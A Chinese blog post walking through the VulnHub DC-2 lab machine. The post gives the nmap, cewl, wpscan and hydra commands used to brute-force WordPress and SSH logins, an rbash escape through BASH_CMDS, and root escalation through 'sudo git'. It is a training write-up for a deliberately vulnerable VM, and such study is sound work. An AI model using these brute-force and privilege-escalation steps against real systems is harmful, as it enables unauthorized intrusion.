渗透测试靶场实战-DC-2

最新推荐文章于 2024-03-14 09:14:59 发布
最新推荐文章于 2024-03-14 09:14:59 发布
阅读量203 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56523504/article/details/120978335
版权

渗透测试靶场实战-DC-2

一,下载资料

链接:https://pan.baidu.com/s/1VtAsxjyLOcanSsqfN_YRHw

提取码:u7yz

二,环境搭建:靶机:172.16.43.141

                攻击机kali:172.16.43.70

三,信息收集

(1)当前网络活跃主机:nmap -sP 172.16.43.0/24 -oN nmap.sP

(2)扫描端口服务:nmap -A 172.16.43.141 -p 1-65535 -oN nmap.A

80 好像就开了80端口了

(3)有一个重定向到http://dc-2            需要给一个本地的解析

     在windows/system32/drivers/etc/hosts   增加:/172.16.43.141 DC-2记录

(4)在访问80网址:http://172.16.43.141      正常 是访问不了的

         信息收集:是:wordpress框架

kali工具:  攻防演练中:要根据网站的信息编辑一个字典   用Cewl工具

输入命令:cewl dc-2 >pwd.dic

(5)目录遍历:扫描一下目录  dirsearch -u http://dc-2

(6)访问:http://dc-2/wp-includes/

版本内核:7.xdrupal漏洞

(7)利用wpscan工具进行网站用户名猜测

输入命令:wpscan --url http://dc-2 -e u             //-u  爆破出网站的用户名

(8)做一个用户名字典  vim user.txt

  

(9)根据目录扫描-找到网站后台   http://dc-2/wp-login.php

(10)可以利用BURP/wpscan进行爆破:wpscan --url http://dc-2 -U user.txt -P pwd.dic

五,系统层面

  1. 尝试登录用tom用户进行登录

用户1:Tom   密码:parturient

没有什么较好的信息,换下个用户进行登录

(2)登录 用户2Jerry   密码:adipiscing

看到了flag2 没有什么收获。。。

(3)尝试爆破7744  ssh

hydra -L user.txt  -P pwd.dic 172.16.43.141 ssh -s 7744 -o hydra.ssh -vV

(4)登录tom用户:用户名:tom 密码:parturient

      输入命令:ssh tom@172.16.43.141 -p 7744

(5)找到了flag3,   但是查看不了  没有权限 echo $0   rbash

六,提权

(1)需要绕过这个限制:

BASH_CMDS[a]=/bin/sh;a                //变量给a

$ /bin/bash                                    //将命令给它就可以了  

export PATH=$PATH:/bin/             //导入环境变量

export PATH=$PATH:/usr/bin           //导入环境变量

        

(2)线索引到了jerry账户

                             

(3)尝试 登录:已经得到了jerry的密码了:   

用户名Jerry   密码adipiscing

​​​​​​​                                     

(4)发现了flag4

(5)sudo -l   history    发现有个git命令  可以以root权限执行命令

 输入命令:sudo git -p --help  //强制进入交互状态

                        

!/bin/bash

(7)进入root目录下  cat final-flag.txt

这就拿到了主机的root权限

总结:

1,根据80端口-写入hosts文件-cewl制作密码字典

2,暴力破解后台-不同用户去尝试登录-再去收集有用信息 ls -a 敏感文件 sudo -l history命令

3提权:BASH_CMDS[a]=/bin/sh;a  git提权

Tom_Jreey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
靶场DC-2
sunxueer的博客
07-27 1361
DC-2环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-2的ip地址2.2 利用namp扫描DC-2开放的端口2.3 访问一下80端口2.4 尝试寻找该网站的CMS3. 寻找flag3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag4.txt3.4 寻找the final flag总结 环境: 靶机名称:DC-2 攻击机:kali 192.168.78.135 1. 打开虚拟机 导入.ova文件,开启虚拟机 2. 信息收集 2.1 nmap
DC-2靶场
m0_74413354的博客
03-14 622
Vulhub下DC系列靶场DC2靶场通关
DC靶场系列--DC2
BGiscool的博客
08-09 1521
DC2靶场
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 404
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
靶机DC-2 WP
m0_66638011的博客
05-13 613
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
DC-2靶场-渗透测试
negnegil的博客
06-06 698
靶机:DC-2 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后导入和kali相同的虚拟机平台即可 靶场的网络模式设置为桥接模式,启动 1.先以ARP扫描以下局域网内靶机的ip arp-scan -l netdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索 2.使用nmap扫一下ip查看端口开放 nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
DC搭建
夜邢的博客
12-29 970
域控搭建 DC搭建
靶机实战(DC-2)
weixin_45605313的博客
06-28 262
DC-2实验环境实验过程主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:DC-2 测试机:kali(IP:192.168.186.128),win10 实验过程 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192.168.186.248
kali中vulhub靶场搭建详细教程
Makboli的博客
04-19 3555
vulhub漏洞环境地址:https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/(如果像此漏洞环境一样是ip+路径形式可直接在url中访问,如果开放的漏洞环境开放在端口上,是“ip:端口”形式,就直接加上端口访问就可以)进入后出现大量漏洞环境类型,里面都有复现教程,根据对应的漏洞去启动对应的docker环境。这里对应漏洞的环境开放地址,去vulhub官网里对应的漏洞复现教程里面都有提及。安装完成后,检查是否安装成功。
2023年SWPU NSS 秋季招新赛 CTF Reverse‘方向WP详解
Sciurdae的博客
10-20 1034
无壳64bit文件,,ida64分析标准的base64,
NSSCTF Crypto靶场练习,31-40WP
Sciurdae的博客
12-12 1020
说说知识点,p和q都是小明文攻击,因为e是2,且p的2次方明显小于n,所以都直接对P和Q开方就可以得到p,q了。根据hint,下一个是栅栏密码,要先提示信息 doyouknowfence删除,不然解不出来,而且这里用的是加密。维吉尼亚密码,网站嗦一下https://www.guballa.de/vigenere-solver。这样可以求出 n1和n2 的最大公约数,继而求出p1,再求 n2和n3 的最大公约数,求出p3。WP链接:https://www.nssctf.cn/note/set/2178。
红日内网渗透靶场2(ATK&CK红队评估实战靶场二)
热门推荐
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网关服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1488
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-2靶场实战详解
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值